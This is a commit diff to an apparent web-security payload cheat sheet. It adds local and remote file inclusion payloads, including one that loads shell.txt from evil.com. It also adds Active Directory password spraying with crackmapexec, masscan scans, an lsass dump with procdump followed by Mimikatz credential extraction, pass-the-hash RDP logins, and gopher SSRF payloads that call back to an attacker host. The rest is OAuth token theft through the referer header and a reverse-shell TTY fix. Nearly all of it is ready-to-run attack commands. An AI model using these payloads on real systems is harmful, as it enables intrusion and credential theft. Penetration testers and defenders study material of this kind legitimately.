Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp

File Inclusion/README.md

@@ -7,6 +7,10 @@
 ## Summary
 
 * [Basic LFI](#basic-lfi)
+    * [Null byte](#null-byte)
+    * [Double encoding](#double-encoding)
+    * [Path truncation](#path-truncation)
+    * [Filter bypass tricks](#filter-bypass-tricks)
 * [Basic RFI](#basic-rfi)
 * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers)
   * [Wrapper php://filter](#wrapper-phpfilter)
@@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director
 http://example.com/index.php?page=../../../etc/passwd
 ```
 
-Null byte
+### Null byte
 
 ```powershell
 http://example.com/index.php?page=../../../etc/passwd%00
 ```
 
-Double encoding
+### Double encoding
 
 ```powershell
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
 http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
 ```
 
-Path truncation
+### Path truncation
+
+On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.
 
 ```powershell
 http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
+http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] 
 http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
 ```
 
-Filter bypass tricks
+### Filter bypass tricks
 
 ```powershell
 http://example.com/index.php?page=....//....//etc/passwd
@@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C
 http://example.com/index.php?page=http://evil.com/shell.txt
 ```
 
-Null byte
+### Null byte
 
 ```powershell
 http://example.com/index.php?page=http://evil.com/shell.txt%00
 ```
 
-Double encoding
+### Double encoding
 
 ```powershell
 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
@@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s
 * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
+* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)

Methodology and Resources/Active Directory Attack.md

@@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
 enum4linux | grep -i desc
 There are 3-4 fields that seem to be common in most AD schemas: 
 UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
+
+Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
 ```
 
 ### PassTheTicket Golden Tickets
@@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module
 
 ### Password spraying
 
-Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
+Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. 
+
+Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing.
 
 ```powershell
 root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt
 root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123
 ```
 
+Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network.
+
+```powershell
+crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
+```
+
 Most of the time the best passwords to spray are :
 
 - Password1

Methodology and Resources/Methodology_and_enumeration.md

@@ -8,6 +8,7 @@
   * The Harvester
 
 * [Active Recon](#active-recon)
+  * Masscan
   * Nmap
   * Nmap Script
   * RPCClient
@@ -47,6 +48,13 @@
 
 ## Active recon
 
+* Masscan
+
+```powershell
+masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
+masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
+```
+
 * Basic NMAP
 
   ```bash

Methodology and Resources/Network Discovery.md

@@ -1,38 +1,14 @@
 # Network Discovery
 
-## Netdiscover
+## Summary
 
-```powershell
-netdiscover -i eth0 -r 192.168.1.0/24
-Currently scanning: Finished!   |   Screen View: Unique Hosts
-
-20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
-_____________________________________________________________________________
-IP            At MAC Address     Count     Len  MAC Vendor / Hostname
------------------------------------------------------------------------------
-192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
-192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
-192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
-192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
-```
-
-## Responder
-
-```powershell
-responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
-responder.py -I eth0 -wrf
-```
-
-Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
-
-## Bettercap
-
-```powershell
-bettercap -X --proxy --proxy-https -T <target IP>
-# better cap in spoofing, discovery, sniffer
-# intercepting http and https requests,
-# targetting specific IP only
-```
+- [Nmap](#nmap)
+- [Masscan](#masscan)
+- [Netdiscover](#netdiscover)
+- [Responder](#responder)
+- [Bettercap](#bettercap)
+- [Reconnoitre](#reconnoitre)
+- [References](#references)
 
 ## Nmap
 
@@ -121,6 +97,13 @@ Host script results:
 List Nmap scripts : ls /usr/share/nmap/scripts/
 ```
 
+## Masscan
+
+```powershell
+masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
+masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000
+```
+
 ## Reconnoitre
 
 Dependencies:
@@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
 If you have a segfault with nbtscan, read the following quote.
 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
 
+## Netdiscover
+
+```powershell
+netdiscover -i eth0 -r 192.168.1.0/24
+Currently scanning: Finished!   |   Screen View: Unique Hosts
+
+20 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 876
+_____________________________________________________________________________
+IP            At MAC Address     Count     Len  MAC Vendor / Hostname
+-----------------------------------------------------------------------------
+192.168.1.AA    68:AA:AA:AA:AA:AA     15     630  Sagemcom
+192.168.1.XX    52:XX:XX:XX:XX:XX      1      60  Unknown vendor
+192.168.1.YY    24:YY:YY:YY:YY:YY      1      60  QNAP Systems, Inc.
+192.168.1.ZZ    b8:ZZ:ZZ:ZZ:ZZ:ZZ      3     126  HUAWEI TECHNOLOGIES CO.,LTD  
+```
+
+## Responder
+
+```powershell
+responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding.
+responder.py -I eth0 -wrf
+```
+
+Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows)
+
+## Bettercap
+
+```powershell
+bettercap -X --proxy --proxy-https -T <target IP>
+# better cap in spoofing, discovery, sniffer
+# intercepting http and https requests,
+# targetting specific IP only
+```
+
 ## References
 
 * [TODO](TODO)

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new
 ## Spawn TTY Shell
 
 Access shortcuts, su, nano and autocomplete in a partially tty shell
+
 /!\ OhMyZSH might break this trick, a simple `sh` is recommended
 
+> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
+
 ```powershell
 ctrl+z
 echo $TERM && tput lines && tput cols
+
+# for bash
 stty raw -echo
 fg
+
+# for zsh
+stty raw -echo; fg
+
 reset
 export SHELL=bash
 export TERM=xterm-256color

Methodology and Resources/Windows - Mimikatz.md

@@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
 ```
 
+## Mimikatz - Mini Dump
+
+Dump the lsass process.
+
+```powershell
+C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
+
+net use Z: https://live.sysinternals.com
+Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
+```
+
+Then load it inside Mimikatz.
+
+```powershell
+mimikatz # sekurlsa::minidump lsass.dmp
+Switch to minidump
+mimikatz # sekurlsa::logonPasswords
+```
+
 ## Mimikatz Golden ticket
 
 ```powershell

Methodology and Resources/Windows - Using credentials.md

@@ -119,18 +119,20 @@ or with crackmapexec
 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
 ```
 
-For Server 2012 R2, Win8.1+
-
-```powershell
-xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12
-```
-
-with Metasploit
+or with Metasploit
 
 ```powershell
 run getgui -u admin -p 1234
 ```
 
+Then log in using xfreerdp 
+
+```powershell
+xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+
+ xfreerd /u:runner /v:10.0.0.1 # password will be asked
+```
+
+
 ## Netuse (Windows)
 
 ```powershell

OAuth/README.md

@@ -1,4 +1,20 @@
-# OAuth 2 - Common vulnerabilities
+# OAuth
+
+## Summary
+
+- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer)
+- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri)
+- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri)
+- [OAuth private key disclosure](#oauth-private-key-disclosure)
+- [Authorization Code Rule Violation](#authorization-code-rule-violation)
+- [Cross-Site Request Forgery](#cross-site-request-forgery)
+- [References](#references)
+
+## Stealing OAuth Token via referer
+
+From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet.
+
+> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer 
 
 ## Grabbing OAuth Token via redirect_uri
 

README.md

@@ -2,7 +2,7 @@
 
 A list of useful payloads and bypasses for Web Application Security.
 Feel free to improve with your payloads and techniques !
-I <3 pull requests :)
+I :heart: pull requests :)
 
 You can also contribute with a beer IRL or with `buymeacoffee.com`
 

Server Side Request Forgery/README.md

@@ -277,6 +277,13 @@ You didn't say the magic word !
 QUIT
 ```
 
+#### Gopher HTTP
+
+```powershell
+gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A
+gopher://<proxyserver>:8080/_POST%20http://<attacker>:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body
+```
+
 #### Gopher SMTP - Back connect to 1337
 
 ```php

XSS Injection/README.md

@@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager 
 - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen  
 - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton
-  - he is able to make stored XSS from a irrelevant domain to main facebook domain 
 - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton
 - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes
 - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek